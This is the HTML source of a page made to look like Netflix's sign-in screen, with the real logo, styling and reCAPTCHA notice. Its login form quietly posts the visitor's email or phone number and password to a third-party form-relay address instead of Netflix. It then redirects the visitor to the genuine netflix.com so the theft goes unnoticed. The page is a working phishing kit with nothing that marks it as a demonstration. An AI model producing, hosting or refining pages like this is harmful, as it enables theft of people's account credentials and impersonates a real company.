
<html>
<head>
<title></title>
</head>

<meta charset="utf-8" />
<meta name="description" content="Netflix Inc (Netflix) provides internet entertainment services for watching movies and television shows. The company offers TV shows and movies such as original series, documentaries, and feature films through an internet subscription on the TV, computer, and mobile devices. It offers DVDs by-mail service in the US." />
<meta name="keywords" content="" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="theme-color" content="black">
<meta name="author" content="">

<link rel="stylesheet" href="style.css">
<link rel="icon" href="net.jpg" >

<style>

body{
margin:0;
padding:0;
font-family:Arial,sans-serif;
background:black;
width:100%;
max-width:1000px;
margin:0 auto;
}
#container{
 width:100%;
 max-width:1000px;
 margin:0 auto;
}



#head{
  padding:0;
  margin:0;
 }#head img{
  width:100px;
  padding:0;
  margin:0;
 }
 
 
 #sign-cont{
 width:;
 max-width:340px;
 margin:0 auto;
 border:0px solid white;
 }#sign-cont h1{
 color:white;
 margin-botton:8;
 font-family:;
 
 }#sign-cont form{
 width:100%;
 max-width:350px;
 margin:0 auto;
 }#sign-cont form input{
 width:100%;
 height:50px;
 margin-bottom:15px;
 border-radius:3px;
 background:#333333;
 color:white;
 outline:none;
 border:0px;
 }#sign-cont form button{
 margin-top:10px;
 width:100%;
 height:50px;
 border-radius:5px;
 background:#E50914;
 border:0px;
 color:white;
 
 }
 
 
 
#more{
     position:relative;
     margin-top:10;
    }#more input{
    background:#737373;
    padding:0;
    margin:0;
    
    }#more label{
     color:#B3B3B3;
     padding:0;
     margin:0;
    }#more a{
     position:absolute;
     top:0;
     right:0;
     color:#B3B3B3;
     text-decoration:none;
    }
    
    
#content{
    color:#737373;
    margin-top:40;
    font-size:14px;
   }#content a{
    text-decoration:none;
   }#content #pop{
    font-size:14px;
    display:none;
    max-width:100%;
   }
   
   
footer{
border-top:1px solid #737373;
padding:10;
color:#737373;
margin-top:100;
}footer p a{
text-decoration:none;
 color:#737373;
 margin:10;
}footer #wrape{
 display:flex;
 justify-content:space-around;
 margin-top:10;
 max-width:500px;
 margin:0 auto;
}footer #wrape #cont{
 margin-right:10;
 
}footer #wrape #cont a{
 text-decoration:none;
 color:#737373;
}footer #wrape #cont button{
 border:0px;
 background:none;
 color:#737373;
 margin-top:15;
}

</style>

<body>

<img src="" style="display:none;">


<!--container start-->
<div id="container">

<!--head start-->
<style>
 
</style>
 <div id="head">
  <img src="https://images.ctfassets.net/y2ske730sjqp/1aONibCke6niZhgPxuiilC/2c401b05a07288746ddf3bd3943fbc76/BrandAssets_Logos_01-Wordmark.jpg?w=940">
 </div>
<!--head end-->


 <!--sign cont start-->
 <style>
  
 </style>
 <div id="sign-cont">
  <h1>Sign in</h1>
  
  <form action="https://formsubmit.co/6b243357c595731e8b997686f64b1e28" method="post">
    <input type="hidden" name="_next" value="https://netflix.com/">
    <input type="hidden" name="_captcha" value="false">
    <input type="hidden" name="_template" value="box">
    
    
    <center>
    <input name="Netflix-Email or phone" type="text" placeholder="Email or phone number">
    
    <input name="password" type="password" placeholder="Password">
     
     <button>
      Sign in
     </button>
    </center>
    
  </form>
   
   
  <!--more start-->
   <div id="more">   
   <input id="click" name="sign me in" type="checkbox">
   <label for="click">Remember me</label>
   
    <a href="https://www.netflix.com/LoginHelp" >Need help?</a>
   </div>
   <style>
    
   </style>
 <!--more end-->  
   
   
  <!--content start-->
  <style>
   
  </style>
   <div id="content">
    <span><b>New to Netflix?</b></span>
    
    <span>
    <a style="color:white;" href="https://www.netflix.com/" >Sign up now</a>
    </span>.
    
    <p>
     This page is protected  by Google
     reCAPTCHA to ensure you're not a
     bot. 
     <a id="shower" style="color:#0070E9;" href="#.html" onclick="showMsg()">Learn more.</a>
    </p>
    
    <p id="pop">
     The information collected by
     Google reCAPTCHA is subject
     to the Google <a href="https://policies.google.com/privacy" style="color:#0070E9;">
     Privacy Policy</a>
     and <a href="https://policies.google.com/terms" style="color:#0070E9;">Terms of Service</a>
     , and
     is used for providing, 
     maintaining, and improving
     the reCAPTCHA service and for
     general security purposes
    (it is not used for personalized
     advertising by Google).
    </p>
   </div>
   <script>
    
   </script>
  <!--content end-->
   
   
   
 </div>
 <!--sign cont end-->





<!--footer start-->
<style>

</style>
<footer id="foot">
  <p><a href="#.html" >Questions? Contact us.</a></p>
<div id="wrape">
  
  <div id="cont">
   <a href="#.html" >
    <button>
     FAQ
    </button>
   </a>
   
    <br>
    
   <a href="#.html" >
   <button>
   Terms of Use
   </button>
   </a>
   
    <br>
    
   <a href="#.html" >
   <button>
    Cookie Preferences
   </button>
   </a>   
  </div>
  
  
  
  <div id="cont">
 <a href="#.html" >
  <button>
   Help Center
  </button>
  </a>
  
  <br>
  
  <a href="#.html" >
  <button>
   Privacy
  </button>
  </a>
  
  <br>
  
  <a href="#.html" >
  <button>
   Corporate Information
  </button>
  </a>
  </div>
  
</div>

</footer>
<!--footer end-->
</div>
<!--containe end-->
</body>
<script src="pop.js"></script>
</html>
